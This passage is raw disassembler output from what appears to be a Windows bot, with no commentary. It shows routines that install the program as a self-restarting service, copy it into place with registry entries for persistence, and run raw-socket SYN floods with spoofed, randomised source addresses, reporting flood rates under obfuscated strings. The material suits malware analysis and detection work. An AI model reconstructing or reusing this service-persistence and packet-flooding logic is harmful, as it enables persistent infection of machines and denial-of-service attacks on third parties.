lea eax, [ebp+var_C0]
push [ebp+var_14]
push [ebp+var_10]
push eax
push edi
push [ebp+var_30]
call sub_42184C
push esi
lea eax, [ebp+var_C0]
push [ebp+var_14]
push [ebp+var_10]
push eax
push edi
push [ebp+var_30]
call sub_421B16
add esp, 30h
loc_4220C7: ; CODE XREF: sub_422009+6F�j
push [ebp+var_40]
call sub_423623
pop ecx
push esi
call dword_437174 ; ExitThread
pop edi
pop esi
loc_4220D9: ; DATA XREF: sub_422147+12�o
cmp [esp+0C8h+var_C4], 5
push esi
jnz short loc_422128
mov esi, offset dword_457E1C
mov ecx, esi
call sub_41DB60
test al, al
jz short loc_42211E
push offset aSystemShutting ; "System shutting down."
push esi
call sub_41CAB4
pop ecx
pop ecx
push 3E8h
call dword_437190 ; Sleep
mov ecx, esi
call sub_41CA82
call dword_456E58 ; WSACleanup
push 0
call dword_4370D4 ; ExitProcess
loc_42211E: ; CODE XREF: sub_422009+E6�j
mov dword_46AFF8, 7
loc_422128: ; CODE XREF: sub_422009+D6�j
push offset dword_46AFF4
push dword_46AFF0
call dword_456E70 ; SetServiceStatus
test eax, eax
jnz short loc_422143
call dword_437170 ; RtlGetLastWin32Error
loc_422143: ; CODE XREF: sub_422009+132�j
pop esi
retn 4
sub_422009 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_422147 proc near ; DATA XREF: sub_418E0F+8B�o
var_4 = byte ptr -4
push ecx
push esi
push edi
push 4
xor esi, esi
pop edi
mov dword_46AFF4, 30h
push offset loc_4220D9
push offset dword_4439CC
mov dword_46AFF8, 2
mov dword_46AFFC, edi
mov dword_46B000, esi
mov dword_46B004, esi
mov dword_46B008, esi
mov dword_46B00C, esi
call dword_456F50 ; RegisterServiceCtrlHandlerA
push offset dword_46AFF4
push eax
mov dword_46AFF0, eax
mov dword_46AFF8, edi
mov dword_46B008, esi
mov dword_46B00C, esi
call dword_456E70 ; SetServiceStatus
lea eax, [esp+0Ch+var_4]
push eax
push esi
push esi
push offset sub_4222F7
push esi
push esi
call dword_437180 ; CreateThread
mov edi, eax
cmp edi, esi
jz short loc_4221DE
push 0FFFFFFFFh
push edi
call dword_43707C ; WaitForSingleObject
push edi
call dword_437044 ; CloseHandle
loc_4221DE: ; CODE XREF: sub_422147+85�j
pop edi
xor eax, eax
pop esi
pop ecx
retn
sub_422147 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4221E4 proc near ; CODE XREF: sub_418E0F+160�p
; sub_418E0F+185�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_104]
push offset aS_4 ; "\"%s\""
push eax
call sub_429B03
add esp, 0Ch
xor esi, esi
push 2
push esi
push esi
call dword_456F28 ; OpenSCManagerA
cmp eax, esi
mov dword_46AFEC, eax
jnz short loc_422224
push [ebp+arg_0]
call sub_42245D
pop ecx
loc_422224: ; CODE XREF: sub_4221E4+35�j
push esi
push esi
push esi
push esi
lea eax, [ebp+var_104]
push esi
push eax
push esi
push 2
push 110h
push 0F01FFh
push offset dword_4439E8
push offset dword_4439CC
push dword_46AFEC
call dword_456FB8 ; CreateServiceA
mov edi, eax
cmp edi, esi
jnz short loc_422278
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 436h
jz short loc_422283
cmp eax, 431h
jz short loc_422283
push [ebp+arg_0]
call sub_42245D
pop ecx
jmp short loc_422288
; ---------------------------------------------------------------------------
loc_422278: ; CODE XREF: sub_4221E4+73�j
push offset loc_443A08
call sub_422335
pop ecx
loc_422283: ; CODE XREF: sub_4221E4+80�j
; sub_4221E4+87�j
call sub_4222A1
loc_422288: ; CODE XREF: sub_4221E4+92�j
push edi
call dword_456DE4 ; CloseServiceHandle
push dword_46AFEC
call dword_456DE4 ; CloseServiceHandle
pop edi
xor eax, eax
pop esi
leave
retn
sub_4221E4 endp
; =============== S U B R O U T I N E =======================================
sub_4222A1 proc near ; CODE XREF: sub_4221E4:loc_422283�p
push esi
push 0F003Fh
push 0
push 0
call dword_456F28 ; OpenSCManagerA
test eax, eax
mov dword_46AFEC, eax
jz short loc_4222F3
push 0F01FFh
push offset dword_4439CC
push eax
call dword_456DC8 ; OpenServiceA
mov esi, eax
test esi, esi
jz short loc_4222F3
push 0
push 0
push esi
call dword_456DD0 ; StartServiceA
test eax, eax
jz short loc_4222F3
push dword_46AFEC
call dword_456DE4 ; CloseServiceHandle
push esi
call dword_456DE4 ; CloseServiceHandle
loc_4222F3: ; CODE XREF: sub_4222A1+17�j
; sub_4222A1+2E�j ...
xor eax, eax
pop esi
retn
sub_4222A1 endp
; =============== S U B R O U T I N E =======================================
sub_4222F7 proc near ; DATA XREF: sub_422147+74�o
var_4 = byte ptr -4
push ecx
push esi
push edi
lea eax, [esp+0Ch+var_4]
xor edi, edi
push eax
push edi
push edi
push offset sub_418FA1
push edi
push edi
call dword_437180 ; CreateThread
mov esi, eax
cmp esi, edi
jnz short loc_42231E
pop edi
xor eax, eax
pop esi
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_42231E: ; CODE XREF: sub_4222F7+1D�j
push 0FFFFFFFFh
push esi
call dword_43707C ; WaitForSingleObject
push esi
call dword_437044 ; CloseHandle
push edi
call dword_437174 ; ExitThread
sub_4222F7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422335 proc near ; CODE XREF: sub_4221E4+99�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push 0F003Fh
inc edi
push ebx
push ebx
mov [ebp+var_8], edi
call dword_456F28 ; OpenSCManagerA
cmp eax, ebx
mov dword_46AFEC, eax
jz short loc_4223C0
mov esi, offset dword_4439CC
push 0F01FFh
push esi
push eax
call dword_456DC8 ; OpenServiceA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_4223C0
push dword_46AFEC
call dword_456E00 ; LockServiceDatabase
cmp eax, ebx
mov [ebp+var_14], eax
jnz short loc_4223D2
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 41Fh
jnz short loc_4223C0
mov ebx, 10Ch
push ebx
push 40h
call dword_437128 ; LocalAlloc
test eax, eax
mov [ebp+var_C], eax
jz short loc_4223C0
lea ecx, [ebp+var_18]
push ecx
push ebx
push eax
push dword_46AFEC
call dword_456E88 ; QueryServiceLockStatusA
test eax, eax
jnz short loc_4223C7
loc_4223C0: ; CODE XREF: sub_422335+25�j
; sub_422335+3E�j ...
xor eax, eax
jmp loc_422458
; ---------------------------------------------------------------------------
loc_4223C7: ; CODE XREF: sub_422335+89�j
push [ebp+var_C]
call dword_43703C ; LocalFree
xor ebx, ebx
loc_4223D2: ; CODE XREF: sub_422335+51�j
push 2
push esi
push dword_46AFEC
call dword_456DC8 ; OpenServiceA
mov dword_46AFEC, eax
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
lea eax, [ebp+var_34]
push eax
push 2
push [ebp+var_4]
mov [ebp+var_1C], 0BB8h
mov [ebp+var_20], edi
mov [ebp+var_28], edi
mov [ebp+var_2C], ebx
mov [ebp+var_30], ebx
mov [ebp+var_34], 0Ah
call dword_457010 ; ChangeServiceConfig2A
test eax, eax
jnz short loc_42241C
mov [ebp+var_8], ebx
loc_42241C: ; CODE XREF: sub_422335+E2�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push edi
push [ebp+var_4]
call dword_457010 ; ChangeServiceConfig2A
test eax, eax
jnz short loc_422437
mov [ebp+var_8], ebx
loc_422437: ; CODE XREF: sub_422335+FD�j
push [ebp+var_14]
call dword_456F54 ; UnlockServiceDatabase
push [ebp+var_4]
call dword_456DE4 ; CloseServiceHandle
push dword_46AFEC
call dword_456DE4 ; CloseServiceHandle
mov eax, [ebp+var_8]
loc_422458: ; CODE XREF: sub_422335+8D�j
pop edi
pop esi
pop ebx
leave
retn
sub_422335 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42245D proc near ; CODE XREF: sub_4221E4+3A�p
; sub_4221E4+8C�p
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_15B = byte ptr -15Bh
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 364h
push ebx
push esi
push edi
lea eax, [ebp+var_364]
push 104h
xor ebx, ebx
push eax
push ebx
call dword_437070 ; GetModuleHandleA
push eax
call dword_43717C ; GetModuleFileNameA
push 40h
xor eax, eax
pop ecx
lea edi, [ebp+var_15B]
mov [ebp+var_15C], bl
push ebx
rep stosd
push dword_4439A4
stosw
stosb
lea eax, [ebp+var_15C]
push eax
push ebx
call dword_437260
mov esi, dword_4370B4
lea eax, [ebp+var_15C]
push eax
push offset dword_457D18
call esi ; dword_4370B4
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
call esi ; dword_4370B4
mov esi, offset dword_4439A8
lea eax, [ebp+var_260]
push esi
push eax
push offset dword_445D68
push [ebp+arg_0]
call sub_429B03
lea eax, [ebp+var_260]
push esi
push eax
call sub_4278B2
add esp, 18h
test eax, eax
jz loc_4225B6
push 1
mov edi, offset byte_443B5B
push [ebp+arg_0]
mov esi, offset dword_443A5C
push edi
push esi
push 80000001h
call sub_421409
push 1
push [ebp+arg_0]
push edi
push esi
push dword_443A58
call sub_421409
push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_429760
push 44h
lea eax, [ebp+var_58]
pop esi
push esi
push ebx
push eax
call sub_429760
add esp, 40h
lea eax, [ebp+var_14]
mov [ebp+var_58], esi
xor esi, esi
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_260]
push eax
inc esi
push ebx
push 28h
push esi
push ebx
push ebx
push ebx
push [ebp+arg_0]
mov [ebp+var_4C], offset byte_454A54
mov [ebp+var_2C], esi
mov [ebp+var_28], bx
call dword_4370D8 ; CreateProcessA
test eax, eax
jz short loc_4225AF
push 0C8h
call dword_437190 ; Sleep
push [ebp+var_14]
mov esi, dword_437044
call esi ; dword_437044
push [ebp+var_10]
call esi ; dword_437044
call dword_456E58 ; WSACleanup
push ebx
call dword_4370D4 ; ExitProcess
loc_4225AF: ; CODE XREF: sub_42245D+128�j
push esi
call dword_4370D4 ; ExitProcess
loc_4225B6: ; CODE XREF: sub_42245D+A3�j
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push offset sub_418FA1
push ebx
push ebx
call dword_437180 ; CreateThread
mov esi, eax
cmp esi, ebx
jz short loc_4225DF
push 0FFFFFFFFh
push esi
call dword_43707C ; WaitForSingleObject
push esi
call dword_437044 ; CloseHandle
loc_4225DF: ; CODE XREF: sub_42245D+170�j
pop edi
pop esi
pop ebx
leave
retn
sub_42245D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4225E4 proc near ; CODE XREF: sub_422903+1F�p
var_2944 = byte ptr -2944h
var_234 = byte ptr -234h
var_A4 = byte ptr -0A4h
var_A3 = byte ptr -0A3h
var_98 = byte ptr -98h
var_90 = byte ptr -90h
var_7C = byte ptr -7Ch
var_68 = word ptr -68h
var_66 = word ptr -66h
var_64 = dword ptr -64h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 2944h
call sub_429B60
push ebx
push esi
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_A3]
mov [ebp+var_A4], bl
mov esi, 100h
rep stosd
stosw
push esi
stosb
call sub_42B4D7
pop ecx
mov edi, eax
push esi
push edi
call dword_456F4C ; gethostname
push edi
call dword_456FD4 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_234]
push eax
push 202h
call dword_4372B8 ; WSAStartup
test eax, eax
jz short loc_422650
push ebx
call dword_437174 ; ExitThread
loc_422650: ; CODE XREF: sub_4225E4+63�j
xor esi, esi
inc esi
push esi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4372C8 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_422699
call dword_4372DC ; WSAGetLastError
push eax
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push offset aSCanTSyn_Error ; "%s Can't Syn. Error: %d"
lea eax, [ebp+var_2944]
push 2710h
push eax
call sub_429BBE
add esp, 14h
push ebx
call dword_437174 ; ExitThread
loc_422699: ; CODE XREF: sub_4225E4+87�j
lea ecx, [ebp+var_48]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_48], esi
call dword_43728C ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_4226DD
call dword_4372DC ; WSAGetLastError
push eax
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push offset aSCanTSyn_Error ; "%s Can't Syn. Error: %d"
lea eax, [ebp+var_2944]
push 2710h
push eax
call sub_429BBE
add esp, 14h
push ebx
call dword_437174 ; ExitThread
loc_4226DD: ; CODE XREF: sub_4225E4+CB�j
push [ebp+arg_4]
mov esi, dword_4372C4
mov [ebp+var_68], 2
call esi ; dword_4372C4
mov edi, [ebp+arg_0]
push 28h
mov [ebp+var_66], ax
mov [ebp+var_64], edi
mov [ebp+var_24], 45h
call esi ; dword_4372C4
push [ebp+arg_4]
mov [ebp+var_22], ax
mov [ebp+var_20], 1
mov [ebp+var_1E], bx
mov [ebp+var_1C], 80h
mov [ebp+var_1B], 6
mov [ebp+var_1A], bx
mov [ebp+var_14], edi
call esi ; dword_4372C4
push 4000h
mov [ebp+var_36], ax
mov [ebp+var_30], ebx
mov [ebp+var_2C], 50h
mov [ebp+var_2B], 2
call esi ; dword_4372C4
mov [ebp+var_2A], ax
lea eax, [ebp+var_58]
push eax
mov [ebp+var_26], bx
mov [ebp+arg_4], ebx
call dword_43718C ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call dword_4370D0 ; QueryPerformanceCounter
push [ebp+var_54]
mov eax, [ebp+arg_8]
cdq
push [ebp+var_58]
push edx
push eax
call sub_42C4F0
add eax, [ebp+var_8]
adc edx, [ebp+var_4]
mov [ebp+var_50], eax
mov [ebp+var_4C], edx
loc_422774: ; CODE XREF: sub_4225E4+2DA�j
call sub_429B9C
cdq
mov ecx, 0FFh
push 14h
idiv ecx
mov eax, [ebp+var_10]
mov [ebp+var_28], bx
and eax, 0FFFFFFh
mov [ebp+var_3C], bl
mov [ebp+var_3B], 6
shl edx, 18h
or edx, eax
mov eax, [ebp+var_14]
mov edi, edx
mov [ebp+var_40], eax
mov [ebp+var_10], edi
call esi ; dword_4372C4
mov [ebp+var_3A], ax
mov [ebp+var_18], edi
call sub_429B9C
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call esi ; dword_4372C4
mov [ebp+var_38], ax
call sub_429B9C
mov edi, eax
shl edi, 10h
call sub_429B9C
or edi, eax
push edi
call esi ; dword_4372C4
movzx eax, ax
mov [ebp+var_34], eax
mov eax, [ebp+var_18]
mov [ebp+var_44], eax
lea eax, [ebp+var_44]
push 0Ch
push eax
lea eax, [ebp+var_A4]
push eax
call sub_429420
push 14h
lea eax, [ebp+var_38]
pop edi
push edi
push eax
lea eax, [ebp+var_98]
push eax
call sub_429420
lea eax, [ebp+var_A4]
push 20h
push eax
call sub_41E3E8
mov [ebp+var_28], ax
lea eax, [ebp+var_24]
push edi
push eax
lea eax, [ebp+var_A4]
push eax
call sub_429420
lea eax, [ebp+var_38]
push edi
push eax
lea eax, [ebp+var_90]
push eax
call sub_429420
push 4
lea eax, [ebp+var_7C]
push ebx
push eax
call sub_429760
add esp, 44h
lea eax, [ebp+var_A4]
push 28h
push eax
call sub_41E3E8
mov [ebp+var_1A], ax
push edi
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_A4]
push eax
call sub_429420
add esp, 14h
lea eax, [ebp+var_68]
push 10h
push eax
push ebx
lea eax, [ebp+var_A4]
push 28h
push eax
push [ebp+var_C]
call dword_437294 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4228C3
add [ebp+arg_4], eax
lea eax, [ebp+var_8]
push eax
call dword_4370D0 ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, [ebp+var_4C]
jg short loc_4228EC
jl short loc_4228B5
mov eax, [ebp+var_8]
cmp eax, [ebp+var_50]
jnb short loc_4228EC
loc_4228B5: ; CODE XREF: sub_4225E4+2C7�j
push [ebp+arg_C]
call dword_437190 ; Sleep
jmp loc_422774
; ---------------------------------------------------------------------------
loc_4228C3: ; CODE XREF: sub_4225E4+2B0�j
call dword_4372DC ; WSAGetLastError
push eax
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push offset aSErrorD ; "%s Error: %d"
lea eax, [ebp+var_2944]
push 2710h
push eax
call sub_429BBE
add esp, 14h
xor eax, eax
jmp short loc_4228FE
; ---------------------------------------------------------------------------
loc_4228EC: ; CODE XREF: sub_4225E4+2C5�j
; sub_4225E4+2CF�j
push [ebp+var_C]
call dword_4372D8 ; closesocket
call dword_4372AC ; WSACleanup
mov eax, [ebp+arg_4]
loc_4228FE: ; CODE XREF: sub_4225E4+306�j
pop edi
pop esi
pop ebx
leave
retn
sub_4225E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422903 proc near ; CODE XREF: sub_4229B7+50�p
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429B60
push [ebp+arg_14]
call sub_41E3EC
push [ebp+arg_20]
push [ebp+arg_1C]
push [ebp+arg_18]
push eax
call sub_4225E4
add esp, 14h
test eax, eax
jnz short loc_4229A9
push esi
call dword_4372DC ; WSAGetLastError
push eax
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push offset aSCanTSyn_Error ; "%s Can't Syn. Error: %d"
lea eax, [ebp+var_2710]
push 2710h
push eax
call sub_429BBE
add esp, 14h
cmp [ebp+arg_8], 0
mov esi, offset aS_5 ; "%s"
jnz short loc_42297B
cmp [ebp+arg_C], 0
jnz short loc_422981
lea eax, [ebp+var_2710]
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CE4A
add esp, 10h
loc_42297B: ; CODE XREF: sub_422903+5A�j
cmp [ebp+arg_C], 0
jz short loc_422997
loc_422981: ; CODE XREF: sub_422903+60�j
lea eax, [ebp+var_2710]
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CDD4
add esp, 10h
loc_422997: ; CODE XREF: sub_422903+7C�j
push [ebp+arg_10]
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
pop esi
loc_4229A9: ; CODE XREF: sub_422903+29�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv [ebp+arg_1C]
leave
retn
sub_422903 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4229B7 proc near ; DATA XREF: sub_40A9FE+6B13�o
var_2830 = byte ptr -2830h
var_120 = dword ptr -120h
var_11C = byte ptr -11Ch
var_9C = byte ptr -9Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2830h
call sub_429B60
mov eax, [ebp+arg_0]
push esi
push edi
push 48h
pop ecx
mov esi, eax
lea edi, [ebp+var_120]
rep movsd
push [ebp+var_10]
mov dword ptr [eax+11Ch], 1
lea eax, [ebp+var_11C]
mov edi, [ebp+var_120]
push [ebp+var_14]
push [ebp+var_18]
push eax
lea eax, [ebp+var_9C]
push [ebp+var_1C]
push [ebp+var_C]
push [ebp+var_8]
push eax
push edi
call sub_422903
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push offset aSS@IkbS ; "%s %s @ (%iKB/s)"
lea eax, [ebp+var_2830]
push 2710h
push eax
call sub_429BBE
add esp, 3Ch
cmp [ebp+var_8], 0
mov esi, offset aS_5 ; "%s"
jnz short loc_422A59
cmp [ebp+var_C], 0
jnz short loc_422A5F
lea eax, [ebp+var_2830]
push eax
lea eax, [ebp+var_9C]
push esi
push eax
push edi
call sub_41CE4A
add esp, 10h
loc_422A59: ; CODE XREF: sub_4229B7+82�j
cmp [ebp+var_C], 0
jz short loc_422A77
loc_422A5F: ; CODE XREF: sub_4229B7+88�j
lea eax, [ebp+var_2830]
push eax
lea eax, [ebp+var_9C]
push esi
push eax
push edi
call sub_41CDD4
add esp, 10h
loc_422A77: ; CODE XREF: sub_4229B7+A6�j
push [ebp+var_1C]
call sub_423623
pop ecx
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_4229B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422A88 proc near ; DATA XREF: sub_40A9FE+792E�o
var_2834 = byte ptr -2834h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2834h
call sub_429B60
mov eax, [ebp+arg_0]
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+var_124]
rep movsd
push [ebp+var_10]
mov edi, [ebp+var_124]
mov dword ptr [eax+120h], 1
lea eax, [ebp+var_A0]
push [ebp+var_C]
push eax
push edi
push [ebp+var_8]
lea eax, [ebp+var_120]
push [ebp+var_20]
push [ebp+var_14]
push [ebp+var_18]
push [ebp+var_1C]
push eax
call sub_422B50
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
lea eax, [ebp+var_2834]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
xor esi, esi
add esp, 3Ch
cmp [ebp+var_C], esi
jnz short loc_422B22
cmp [ebp+var_10], esi
jnz short loc_422B27
lea eax, [ebp+var_2834]
push eax
lea eax, [ebp+var_A0]
push eax
push edi
call sub_41CE4A
add esp, 0Ch
loc_422B22: ; CODE XREF: sub_422A88+7C�j
cmp [ebp+var_10], esi
jz short loc_422B3E
loc_422B27: ; CODE XREF: sub_422A88+81�j
lea eax, [ebp+var_2834]
push eax
lea eax, [ebp+var_A0]
push eax
push edi
call sub_41CDD4
add esp, 0Ch
loc_422B3E: ; CODE XREF: sub_422A88+9D�j
push [ebp+var_20]
call sub_423623
pop ecx
push esi
call dword_437174 ; ExitThread
pop edi
pop esi
sub_422A88 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422B50 proc near ; CODE XREF: sub_422A88+53�p
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 98h
push ebx
push esi
xor esi, esi
push edi
inc esi
push 338h
push 200h
mov [ebp+var_1C], esi
call sub_41E415
pop ecx
mov [ebp+var_4], eax
pop ecx
mov ebx, 0FFh
push 2
xor ecx, ecx
pop edx
xor eax, eax
cmp [ebp+arg_14], esi
lea edi, [ebp+var_54]
mov [ebp+var_88], ecx
mov [ebp+var_84], esi
mov [ebp+var_80], edx
mov [ebp+var_7C], 4
mov [ebp+var_78], 6
mov [ebp+var_74], 8
mov [ebp+var_70], 0Ch
mov [ebp+var_6C], 0Eh
mov [ebp+var_68], 15h
mov [ebp+var_64], 2Ch
mov [ebp+var_60], 6Fh
mov [ebp+var_5C], ebx
mov [ebp+var_58], ecx
mov [ebp+var_4C], ecx
stosd
lea edi, [ebp+var_24]
mov [ebp+var_48], ecx
mov [ebp+var_44], ecx
mov [ebp+var_40], 200h
mov [ebp+var_3C], edx
mov [ebp+var_38], 4
mov [ebp+var_34], 10h
mov [ebp+var_30], 1A0Ah
mov [ebp+var_2C], esi
mov [ebp+var_28], ecx
stosd
jnz short loc_422C19
push offset dword_457C40
call sub_41E3EC
pop ecx
mov edi, eax
jmp short loc_422C3D
; ---------------------------------------------------------------------------
loc_422C19: ; CODE XREF: sub_422B50+B8�j
mov esi, 100h
push esi
call sub_42B4D7
pop ecx
mov edi, eax
push esi
push edi
call dword_456F4C ; gethostname
push edi
call dword_456FD4 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov edi, [eax]
loc_422C3D: ; CODE XREF: sub_422B50+C7�j
push ebx
push 3
push 2
call dword_4372BC ; socket
lea ecx, [ebp+var_1C]
push 4
push ecx
push 2
push 0
push eax
mov [ebp+arg_14], eax
call dword_43728C ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_422CC3
cmp [ebp+arg_20], 0
mov edi, dword_437170
mov esi, offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
mov ebx, offset aSCanTUseRawOpt ; "%s Can't use raw opt: %d"
jnz short loc_422C90
cmp [ebp+arg_24], 0
jnz short loc_422C96
call edi ; dword_437170
push eax
push esi
push ebx
push [ebp+arg_1C]
push [ebp+arg_18]
call sub_41CE4A
add esp, 14h
loc_422C90: ; CODE XREF: sub_422B50+125�j
cmp [ebp+arg_24], 0
jz short loc_422CA9
loc_422C96: ; CODE XREF: sub_422B50+12B�j
call edi ; dword_437170
push eax
push esi
push ebx
push [ebp+arg_1C]
push [ebp+arg_18]
call sub_41CDD4
add esp, 14h
loc_422CA9: ; CODE XREF: sub_422B50+144�j
push [ebp+arg_14]
call dword_4372D8 ; closesocket
push [ebp+arg_10]
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
loc_422CC3: ; CODE XREF: sub_422B50+10F�j
push [ebp+var_4]
call sub_4297B8
mov esi, dword_437188
pop ecx
mov [ebp+arg_24], eax
call esi ; dword_437188
push [ebp+arg_0]
mov [ebp+arg_1C], eax
call dword_456F7C ; inet_addr
push [ebp+arg_4]
mov [ebp+var_94], eax
mov [ebp+var_98], 2
call dword_4372C4 ; ntohs
mov [ebp+var_96], ax
jmp loc_422DDF
; ---------------------------------------------------------------------------
loc_422D07: ; CODE XREF: sub_422B50+2A0�j
call sub_429B9C
cdq
mov ecx, ebx
and edi, 0FFFFFFh
idiv ecx
shl edx, 18h
or edi, edx
call sub_429B9C
cdq
mov ecx, 0F4h
idiv ecx
